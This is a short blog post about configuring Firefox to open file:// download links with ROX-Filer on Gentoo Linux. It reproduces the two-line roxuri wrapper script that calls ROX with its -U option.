Filed by kargig at 21:35 under Gentoo, Linux
Tags: blocks, eclass, Gentoo, kde, Linux, portage, qt
1 Comment | 2,749 views

Firefox has the feature of keeping links to downloaded files as urls using the file:// pattern. For example: file:///home/user/downloads/test.zip. If you choose ROX-Filer (/usr/bin/rox) to open these files you will get an error:

File doesn’t exist, or I can’t access it: file:///home/user/downloads/test.zip

One way to correct the error is to follow the instructions of http://lovingthepenguin.blogspot.com/2008/08/use-rox-filer-to-open-containing.html

Another way for Gentoo users, and much proper I guess, is to use /usr/bin/roxuri. roxuri is actually a shell script that uses the “-U” option for ROX:

-U, –url=URL open file or directory in URI form

For the non-Gentoo users, /usr/bin/roxuri is:
#!/bin/sh
exec "/usr/lib/rox/ROX-Filer/AppRun" -U "$@"

Create it and make it executable.

Go to Firefox Preferences/Applications/Content Type -> file and select /usr/bin/roxuri as the default application.

Now files from firefox downloads are handled correctly by rox which uses the proper applications to open them and containing folders open up with ROX-Filer. That means that while “file” is handled by roxuri, a .pdf will be opened by epdfview or whatever else you have chosen ROX to open pdf files with.

Both solutions work on ROX version 2.8.

Filed by kargig at 18:17 under Gentoo, Linux
Tags: bug, file://, firefox, Gentoo, Linux, rox, tip
1 Comment | 1,184 views